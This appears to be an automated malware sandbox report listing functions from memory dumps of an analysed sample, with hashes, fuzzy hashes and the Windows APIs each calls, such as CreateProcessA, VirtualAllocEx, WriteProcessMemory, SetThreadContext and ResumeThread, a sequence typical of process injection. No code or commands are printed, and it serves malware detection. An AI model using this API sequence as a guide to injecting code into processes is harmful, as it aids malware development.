Uniqueness Score: -1.00%

Function 001E8BEE, Relevance: 2.8, Strings: 2, Instructions: 273COMMON

Download Yara Rule

Strings

48>m, xrefs: 001E8C38
H8M, xrefs: 001E8E07

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: 48>m$H8M
API String ID: 0-4006664509
Opcode ID: ed9e36a887549ffbe6deebedb50a4b1233d3c57a842a91c83d0a521fd9a5f2ca
Instruction ID: 55583721b16940bce7d8471b318955e2a25d6d11164619ba3a0274f6cd346f3c
Opcode Fuzzy Hash: ed9e36a887549ffbe6deebedb50a4b1233d3c57a842a91c83d0a521fd9a5f2ca
Instruction Fuzzy Hash: 10B19035A152298FDB14EF69E9446ADB7B3FFC8301F15C52AE40AAB354DF306A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001E0CA5, Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

(F>m, xrefs: 001E0E7C

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: (F>m
API String ID: 0-1108586279
Opcode ID: 2de5d477dd242f3f6d2f52c384e2508f2b6c819db89d1077777c951dfe9e2021
Instruction ID: 3ad9c8dbd8f12a7bb693de9cd89c111f16413b0626790b68bb46792886a5c0d8
Opcode Fuzzy Hash: 2de5d477dd242f3f6d2f52c384e2508f2b6c819db89d1077777c951dfe9e2021
Instruction Fuzzy Hash: 5FD15C78A006198FDB15CF7AD884BADB7F2BF88304F158569E00AEB364DB349D81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E5EB0, Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

J-p, xrefs: 001E6149

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: J-p
API String ID: 0-645735091
Opcode ID: f29fe09cc2abcdff681a3e945c4819c5d3a34bf70f86a63cdd2f428846924ba2
Instruction ID: d66e5c74765b2cf837450f64e3ba81f1bf61cb6a5e73478ebd12f399371067cb
Opcode Fuzzy Hash: f29fe09cc2abcdff681a3e945c4819c5d3a34bf70f86a63cdd2f428846924ba2
Instruction Fuzzy Hash: D1B18070E00659CFDF14CFAAC8817AEBBF2BF98754F148529E414E7254EB749881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001E07C8, Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

(F>m, xrefs: 001E09C8

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: (F>m
API String ID: 0-1108586279
Opcode ID: ee16c58b81044ed5a9aeb1a64e92e213d6c455d15ed783b143de67dd0d59a83e
Instruction ID: cd649ff747f68f3896d0ed49bf201654a45a2d6c4fe8428fc15004730e68f97e
Opcode Fuzzy Hash: ee16c58b81044ed5a9aeb1a64e92e213d6c455d15ed783b143de67dd0d59a83e
Instruction Fuzzy Hash: F89128B8E0064EDFDF14CFA6D580AAEBBB1FF48304F21A925D406EB255DB719981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E1D78, Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

t>m, xrefs: 001E1E00

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID: t>m
API String ID: 0-174180194
Opcode ID: f672ebeb379b84bafd611d24f6dd08624815d16d17943364598c513809b75003
Instruction ID: c5bf2ff368337badbe5ce4e16cda1d6c187e922815c67e5627514039739dcf83
Opcode Fuzzy Hash: f672ebeb379b84bafd611d24f6dd08624815d16d17943364598c513809b75003
Instruction Fuzzy Hash: 9A819E32F105549FC714DBAAC890AAEB7E3AFC8754F2A8474E4059B365DF70AC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001E1E2A, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4eb772129fabeca9d950565d6105ede2a8882ea67dfecdb6be905447372495
Instruction ID: 03dc537d617e8885b9630c9305942a2d32059f755cf2da12697e3c2b210c8bb3
Opcode Fuzzy Hash: 1c4eb772129fabeca9d950565d6105ede2a8882ea67dfecdb6be905447372495
Instruction Fuzzy Hash: EC618A32F105248FD704DB69C890AAEB3A3AFC8754F1AC574E415AB3A9DB71AC01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001ED1D8, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bbe0926cba337ca77d6e30014aef18a66cfff20c2bdaad1da96812f44d83c1
Instruction ID: b4c9b5c236625c6f82cb701166a277c4dec75f4ba7f72d4c20d5b299b475fa36
Opcode Fuzzy Hash: 49bbe0926cba337ca77d6e30014aef18a66cfff20c2bdaad1da96812f44d83c1
Instruction Fuzzy Hash: F751D8B4D09698CFDB18CFA6D584BECB7B5BB4A300F2190AAD50AA7351D7309D85DF10

Uniqueness

Uniqueness Score: -1.00%

Function 005E0014, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c80ec09b95ec57cbf5a644f314fbc88bfaca42f39961c94534d88412bc9f6e
Instruction ID: 0379766a70bdc6a122ee6ecf86d452832a18ab9009edd9020676b11966a529ab
Opcode Fuzzy Hash: d6c80ec09b95ec57cbf5a644f314fbc88bfaca42f39961c94534d88412bc9f6e
Instruction Fuzzy Hash: E631FA71D096988FDB69DF6A8C58299BBF2AFC9300F14C1FAC44DA62A5DB300985DF01

Uniqueness

Uniqueness Score: -1.00%

Function 005E0048, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 739066af6b368cf8df2540dda5345422e26632e73ef8ed145862c14e34e3be62
Instruction ID: d62a3edc769bd61a4bf53b329ac72fcf90f203c46417d02b6e325c96e53a8c46
Opcode Fuzzy Hash: 739066af6b368cf8df2540dda5345422e26632e73ef8ed145862c14e34e3be62
Instruction Fuzzy Hash: CD217771D096688BDB68DF6BCC48699BBF7BFC8300F14D1BA940DA6265EB700981DF00

Uniqueness

Uniqueness Score: -1.00%

Function 001EEA76, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 244processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001EECAE

Strings

t`M, xrefs: 001EED94

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID: t`M
API String ID: 963392458-3240709908
Opcode ID: 239fd3ccc803e7b4b9342617da61d88e7e380360257ce2b688b4f75851dd56e1
Instruction ID: ddd2a9c8e81fe4f23bcc74e72b8a2e9463582b00ae1d8375e3e7ba41d6ce2798
Opcode Fuzzy Hash: 239fd3ccc803e7b4b9342617da61d88e7e380360257ce2b688b4f75851dd56e1
Instruction Fuzzy Hash: 4C915971D006598FDB24CFA5CC417EEBBF2BF48314F1486A9E819A7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001EEA78, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001EECAE

Strings

t`M, xrefs: 001EED94

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: CreateProcess
String ID: t`M
API String ID: 963392458-3240709908
Opcode ID: 69e9a523e02ba210cf2c78f4e429b730cfbc3213c9df858612dace150b0dd9da
Instruction ID: 446eca989edd93ab0d3af2724e176ea51b51ecdfc4b3adecc6fd364063bfcf25
Opcode Fuzzy Hash: 69e9a523e02ba210cf2c78f4e429b730cfbc3213c9df858612dace150b0dd9da
Instruction Fuzzy Hash: BD915971D006598FDB24CFA9CC417EEBBF2BF48314F1485A9E819A7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001E2C90, Relevance: 1.7, APIs: 1, Instructions: 233threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 001E2E1A

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e08938eff3c9e780e3540a5d5a5bfdff97a49a51867d3bf97ccb8fbbe5252c20
Instruction ID: 61e834237e1b345360d25bd91da3b88f809420c268b2d92136c363f5927e997a
Opcode Fuzzy Hash: e08938eff3c9e780e3540a5d5a5bfdff97a49a51867d3bf97ccb8fbbe5252c20
Instruction Fuzzy Hash: 13814630E046988FCB14CFAAC8506EEFFF9BF86304F28846ED415A7241C7758905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005E1D5D, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 005E1E69

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 98f1816a9fd8456bfa5488087d4258400a066dc65f3816cd526f7ca4a8a55baa
Instruction ID: 7fda3f3bf930bc6d2973406cbd25a81e4588311d205226622803a0ff07797662
Opcode Fuzzy Hash: 98f1816a9fd8456bfa5488087d4258400a066dc65f3816cd526f7ca4a8a55baa
Instruction Fuzzy Hash: A2413574D00A88CFCB18CFAAC894B9EBFF5BF48314F148529E859AB291C7749845CF95

Uniqueness

Uniqueness Score: -1.00%

Function 005E1D68, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 005E1E69

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 4eab6a59f8a95eb1ae2bd57d445d2421e22f3878af810b934bd80a8b28a09880
Instruction ID: db224e7fad2ff96807a2e321775dc47550336bfffb329899c9e8024bb2cb9dc8
Opcode Fuzzy Hash: 4eab6a59f8a95eb1ae2bd57d445d2421e22f3878af810b934bd80a8b28a09880
Instruction Fuzzy Hash: 17415774D006888FCB18CFAAC894B9EBFF5BF48314F148529E859AB381D7749841CF95

Uniqueness

Uniqueness Score: -1.00%

Function 001ED840, Relevance: 1.6, APIs: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,00000000,?), ref: 001ED8E1

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: c0ab59d595252514432ca84d290810b19568705723131f355baf81a5b7e39278
Instruction ID: 22b6ef7792b7b9ec3a33e0edf148da2cbfebbcac7b87e1a0d63f46af6526a6ea
Opcode Fuzzy Hash: c0ab59d595252514432ca84d290810b19568705723131f355baf81a5b7e39278
Instruction Fuzzy Hash: BA315CB5D016599FDB00CFA9D884BEEFBF4EF89310F14816AE808B7241D7749A44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001EE8CC, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 001EE960

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f7692f5bfe450bcfdeb9e760df718ab0f3de41823273e7950ef2c062f83d5e08
Instruction ID: 1a36e1cb20961a207fbcea931c069e4cc3deb2d01553f57e083f93e7b94725de
Opcode Fuzzy Hash: f7692f5bfe450bcfdeb9e760df718ab0f3de41823273e7950ef2c062f83d5e08
Instruction Fuzzy Hash: 242146759002499FCB10CFA9D884BEEBBF5FF48314F50892AE959A7241C7789944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001ED848, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,00000000,?), ref: 001ED8E1

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 90b4237624f5a007b337de3ac75b0d300fb4ae5062911f7336b56fcfab53cbdb
Instruction ID: 791eab6e4c2b9b541620e4784846ef1053228028d6f922c9d35bc1534ae986e1
Opcode Fuzzy Hash: 90b4237624f5a007b337de3ac75b0d300fb4ae5062911f7336b56fcfab53cbdb
Instruction Fuzzy Hash: 092148B5D016199FDB00CF9AD884BEEFBF4EF88310F14816AE818B7241D7349A40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001EE8D0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 001EE960

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b2a7eb60ff41e3d757103aab6d69b19a201cb53fbc4745bd338886fe9aac8629
Instruction ID: 3cc442fbe5293df635d399b9785c283a3ffdc72ad9115e859a3ac90f7562830b
Opcode Fuzzy Hash: b2a7eb60ff41e3d757103aab6d69b19a201cb53fbc4745bd338886fe9aac8629
Instruction Fuzzy Hash: 6F2127759003499FCB10CFA9D884BDEBBF5FF48314F50882AE959A7241D778A954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001EEEB3, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001EEF38

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2dd3e7e45fc654eec8f288f90a94a422e3e23c42c7d02f2fa2b5bcab80c0e418
Instruction ID: 7345c65f3730235aacc552aeb493ba85cb3bf4f89d4a16fdf0d68678c8b36874
Opcode Fuzzy Hash: 2dd3e7e45fc654eec8f288f90a94a422e3e23c42c7d02f2fa2b5bcab80c0e418
Instruction Fuzzy Hash: 5721457580064D9FCB10CFAAD884AEEFBF5FF48314F50892AE919B7240C7789945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005E1930, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 005E19BB

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: ac8676c851c3bf68e37685627638e5e9642a09d225ef99f720cb0d931763e7a0
Instruction ID: cfa1517090dae78bae7513db24dea210792fb12ea4efd7a1f676512d551d4961
Opcode Fuzzy Hash: ac8676c851c3bf68e37685627638e5e9642a09d225ef99f720cb0d931763e7a0
Instruction Fuzzy Hash: 112148B5D016599FCB00CF99D884BEEFFB4FB49310F10822AE858B3641C3789940CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001EE730, Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001EE7B6

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 319e68b82e7f75c4c5463b1c4f80e6ec72edf8c9238dd9cd19c3feeba5d8e83f
Instruction ID: 6a9460458f1cfe46325b7c571e25705901300e83d0dea82d775df6a9326cdd2b
Opcode Fuzzy Hash: 319e68b82e7f75c4c5463b1c4f80e6ec72edf8c9238dd9cd19c3feeba5d8e83f
Instruction Fuzzy Hash: 77219A75D002488FDB10CFA9C4847EEBBF5AF49314F54882AD419B7240C7789944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 005E2130, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 005E21B0

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 6394e6482a9de9c320c8a487a07b7e60efd67cb404f6b5842e441939f24a6d60
Instruction ID: 544b01f1a3c5529b2ff55302851ffade82919b23bd6c9eaf7897c53549883774
Opcode Fuzzy Hash: 6394e6482a9de9c320c8a487a07b7e60efd67cb404f6b5842e441939f24a6d60
Instruction Fuzzy Hash: 572148B1D042498FDB14CFA9D844BEEFBF5FB89310F14842AD455A3291C7789A44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 001EEEB8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001EEF38

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 99f297a111fcadc5b206148ed553f8b92b4275152c69e331451ad511a6b86005
Instruction ID: 3c78a80e916ae10402745b14c02f4a0430a4ce5506da189f570661221b84bb35
Opcode Fuzzy Hash: 99f297a111fcadc5b206148ed553f8b92b4275152c69e331451ad511a6b86005
Instruction Fuzzy Hash: 9221287590064D9FCB10DFAAD884AEEFBF5FF48314F50882AE919A7240D7789940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001EE738, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001EE7B6

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9c0f987eeecc5925822f735e92708d25c24984ccad00cd1b787132804a40540d
Instruction ID: d0d8e1c4e87853343ee9970728f40837360059674b517fd359946fcc1e3b6aec
Opcode Fuzzy Hash: 9c0f987eeecc5925822f735e92708d25c24984ccad00cd1b787132804a40540d
Instruction Fuzzy Hash: 44214975D002098FDB10DFAAC4847EEBBF5EF49314F54882AD919B7240DB78A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 005E1938, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 005E19BB

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 29acae2e12bc9faa390a6cc344103ce59c84902fcdf508e93e9891fc3f6eec79
Instruction ID: d46c417bf474566e92c38f7914c2b7de4dc262ee0034aa7545211c5cbabc03f5
Opcode Fuzzy Hash: 29acae2e12bc9faa390a6cc344103ce59c84902fcdf508e93e9891fc3f6eec79
Instruction Fuzzy Hash: 762123B1D006199FCB00CF9AD884BEEFBB4FB49310F10852AE818B3240D378A940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 005E2138, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 005E21B0

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 901fc0fa86e85acb06552c16ff4c0e84aa261137514eed1bf41c30c831f7d12f
Instruction ID: b787263ff5ad6a68eb192c3de0305a3ac8b553d17ae7599cfa1642401cf8dabb
Opcode Fuzzy Hash: 901fc0fa86e85acb06552c16ff4c0e84aa261137514eed1bf41c30c831f7d12f
Instruction Fuzzy Hash: 932107719002499FDB14CF9AD844BEEFBF9BB89314F14842AD559A3250C778AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 005E1C99, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 005E1D13

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: c1ebb275e0fd06acf02860a75873e12b6e094309bec0b937717d807a457215b7
Instruction ID: 5ac52347b9ddf7c36b08b9abc2e36beef734d160ddd784d29e1f6cd7b90d4ee5
Opcode Fuzzy Hash: c1ebb275e0fd06acf02860a75873e12b6e094309bec0b937717d807a457215b7
Instruction Fuzzy Hash: B721E5759006499FCB10DF9AD484BDEBBF4BF48320F54882AD468B7650C778A644CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 005E1CA0, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 005E1D13

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: e356f42869dd281f96750f73651e751b3ab89db0c96a5c7fdb0081f458efe201
Instruction ID: 75394c727675787e43c9c7609d4222558fc2cc2f6b626755e4c49ca1066396ef
Opcode Fuzzy Hash: e356f42869dd281f96750f73651e751b3ab89db0c96a5c7fdb0081f458efe201
Instruction Fuzzy Hash: 8E2108759006499FCB10CF9AC844BDEBBF4FF49310F50842AE858A7250D778A644CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001EE80B, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001EE87E

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f53475ddb4cf29554eac51f2a40a28f2d8d6d117789270695c5ed4742c57d375
Instruction ID: f8d2e0ee6b0f05f14dd23f8445e7dba3c127af23d1f0b063f2bb418c7215fb05
Opcode Fuzzy Hash: f53475ddb4cf29554eac51f2a40a28f2d8d6d117789270695c5ed4742c57d375
Instruction Fuzzy Hash: F01167758002488FCB10CFA9D844BEEBFF5AF88314F14881AD919A7250C7799540CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001EE810, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001EE87E

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 57811db54331aa037f0c188f88aca6babc2e89b979c93606f516da384be54b04
Instruction ID: a65cfb2d15da1582beb88fb30ffec532ddc1d65963d09159368d89ba4a7c1f0c
Opcode Fuzzy Hash: 57811db54331aa037f0c188f88aca6babc2e89b979c93606f516da384be54b04
Instruction Fuzzy Hash: 6A11677590024C9FCB10DFAAD844BDFFBF5AF88314F14881AE919B7250C779A940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E2DB8, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 001E2E1A

Memory Dump Source

Source File: 00000004.00000002.2241478044.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 65bd47f2fd71c7bc5cdd2c9c7d55b62b8e55f3214bdb4497f688361a76827e5b
Instruction ID: 15e4bf959b8f88f9d2d60405619fb3c3b071a43c40123d4d0e4a17c9f393c1e0
Opcode Fuzzy Hash: 65bd47f2fd71c7bc5cdd2c9c7d55b62b8e55f3214bdb4497f688361a76827e5b
Instruction Fuzzy Hash: 03114C75D006588FCB10DFAAD4447EFFBF9AF89314F24882AD519B7240DB78A944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005E1F40, Relevance: 1.3, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 005E1FA7

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 65589a9580b9755bc8b70bb836008ebfdb034e0de73862893a24f05d5ca2b4cc
Instruction ID: f93763bd74805348cb42f5f239ed58842b7eda5c4c596d6f212216a2a6784732
Opcode Fuzzy Hash: 65589a9580b9755bc8b70bb836008ebfdb034e0de73862893a24f05d5ca2b4cc
Instruction Fuzzy Hash: D51146759006498FCB10CF99D484BEEFBF4BF89314F14896AD868A7640C778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 005E1F48, Relevance: 1.3, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 005E1FA7

Memory Dump Source

Source File: 00000004.00000002.2241736675.00000000005E0000.00000040.00000001.sdmp, Offset: 005E0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 320b735df182f049057ddf560dee5733bb3831946a085e1a0b39457b88e202eb
Instruction ID: 543581cef4469a1357938fbf32158bf41e6cb39385a98c15e85e5dd1e20cbd04
Opcode Fuzzy Hash: 320b735df182f049057ddf560dee5733bb3831946a085e1a0b39457b88e202eb
Instruction Fuzzy Hash: DC1128758006498FCB10CF9AD444BDEBBF4BF89324F14886AD458B7640C778A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004E0001, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241643319.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e0e9bbb3661721fa458dc13fd0fffff1711ea2a2a6991d062a4a5d5774713f
Instruction ID: 70b31659e4296cdced9680b3ba4491fc901b7d1bbd5e509e006f909633b9aa5c
Opcode Fuzzy Hash: 86e0e9bbb3661721fa458dc13fd0fffff1711ea2a2a6991d062a4a5d5774713f
Instruction Fuzzy Hash: 5031D63020D3C49FCB128E329C607A67FA16F42316F1985A7D4958B2F3E7AD8885C322

Uniqueness

Uniqueness Score: -1.00%

Function 004E0068, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241643319.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aac9973f835ec044f6739a132c194fd6504aaf0a35ea9c1b4b4c9d0cce70dd5
Instruction ID: a9eab5886eb51c1a77b528491d27eac30d24ad3584d066f4bb1bc523d66689f7
Opcode Fuzzy Hash: 7aac9973f835ec044f6739a132c194fd6504aaf0a35ea9c1b4b4c9d0cce70dd5
Instruction Fuzzy Hash: 9D3107313042859BCB254E66D85077BB7D6AF80316F24843BE9558B3A1DBBACCC2D751

Uniqueness

Uniqueness Score: -1.00%

Function 0012D64C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2241066020.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f019dcf36c234a6fd44cfe60b337d3bc34f2c1bb46e7f5c595c2416183f75ec
Instruction ID: 1f342a8815ca366a2085814e856468946cc65c65c6887995b1b43eaca551b8b6
Opcode Fuzzy Hash: 7f019dcf36c234a6fd44cfe60b337d3bc34f2c1bb46e7f5c595c2416183f75ec
Instruction Fuzzy Hash: E7213775504244DFDB05DF50F8C0F26BF66FB98318F2085A9E8090B246C33AD866DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0012D560, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

